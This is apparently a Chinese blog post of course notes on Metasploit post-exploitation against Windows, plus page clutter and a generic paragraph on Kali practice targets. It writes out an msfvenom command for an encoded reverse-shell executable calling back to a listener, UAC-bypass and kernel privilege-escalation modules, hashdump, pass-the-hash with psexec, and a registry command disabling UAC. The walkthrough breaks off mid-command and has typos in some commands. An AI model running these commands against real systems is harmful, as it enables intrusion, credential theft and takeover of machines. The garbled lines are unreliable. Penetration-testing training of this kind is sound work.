Kali Linux渗透测试——MSF实战篇(二)

笔记内容参考安全牛课堂苑房弘老师的Kali Linux渗透测试教程

基于已经获得目标系统控制权后扩大攻击效果

  • 提权
  • 信息收集
  • 渗透内网
  • 永久后门

后渗透阶段可以做的大量工作,很大程度上取决于meterpreter/shell的强大功能

一、基于已有session提权

首先进入meterpreter/shell,诱使攻击目标访问构造程序后,即反弹shell

msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.11.151 LPORT=4444 -b "\x00" -e x86/shikata -i 9 -f exe -o 1.exe

拿到metepreter shell后提权
注意:用msfvenom构造的windows/meterpreter/reverse_tcp默认是x86架构,windows/x64/meterpreter/reverse_tcp是x64架构

load priv
getsystem           

此时若显示Operation failed:Access is denied,则一般是因为UAC,接下来绕过UAC限制

UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista之后的系统引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限

local目录中的模块主要针对已获取的session

#方法一:
use exploit/windows/local/ask       
set session
set filename
run                                 #UAC会询问是否接受未知程序,如果选择是,则通过UAC许可

#方法二:
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
set session
set payload
run
#随后在生成的shell中提权
getsystem
getuid               #可以看见提升为系统用户

只有管理用户组中的成员绕过UAC后才能提权,普通用户即便是绕过了UAC,一样无法提权到system,此时要利用漏洞直接提权为system。

use exploit/windows/local/ms13_053_schlamlperei
set payload/RHSOTS/session
run                                 #此时getuid可以看到直接就是system权限

use exploit/windows/local/ms13_081_track_popup_menu
set payload/RHSOTS/session
run

#也可以使用图形化payload,可以监视攻击目标的桌面(注意这个payload并不是所有模块都能使用,ms13_053_schlamlperei可以使用)
set payload windows/vncinject/reverse_tcp   
#如果要操作攻击者的桌面,要修改参数viewonly为no                         

VNC和远程桌面都能实现远程控制,不同的是:VNC使用RFB协议(C/S架构5900端口,B/S架构5800端口),远程桌面使用RDP协议(3389端口)

二、提权后进一步操作

1.密码获取与登录
#在具备系统权限的shell中运行hashdump模块
run post/windows/gather/hashdump           
#在得到哈希值后,可以用passthehash,根据哈希值直接登录用户
#passthehash在metasploit中也有专用模块
use exploit/windows/smb/psexec
set SMBUser
set SMBPass xxx:xxx(hash值)
set payload windows/meterpreter/reverse_tcp
run            #失败则可能是由于UAC(Command=17,woedCount=0)

#可以利用已经获取的session运行远程命令,关掉UAC
#关掉UAC的命令
cmd.exe /k %windir%\System32\reg.exe ADD
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFRWARE
  • 4
    点赞
  • 37
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux是一种专门用于渗透测试和网络安全的操作系统。它集成了大量的渗透测试工具和资源,使得安全专业人员能够有效地评估和保护网络系统的安全性。 Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux渗透测试靶机: 1. Metasploitable:Metasploitable是一个故意构建的易受攻击的虚拟机,它包含了多个漏洞和弱点,可以用于学习和实践Metasploit框架的使用。 2. DVWA(Damn Vulnerable Web Application):DVWA是一个故意构建的Web应用程序,包含了多个常见的Web漏洞,如SQL注入、XSS等,可以用于学习和实践Web应用程序渗透测试技术。 3. OWASP Mutillidae II:Mutillidae II是一个故意构建的Web应用程序,旨在模拟真实世界中的各种Web漏洞和攻击场景,包括SQL注入、文件包含等。 4. Hack The Box:Hack The Box是一个在线平台,提供了一系列的渗透测试靶机,每个靶机都有不同的漏洞和挑战,可以用于测试和提高渗透测试技能。 这些渗透测试靶机都可以在Kali Linux上进行安装和使用。通过实践和探索这些靶机,安全专业人员可以提高他们的渗透测试技能,并了解如何保护网络系统免受各种攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值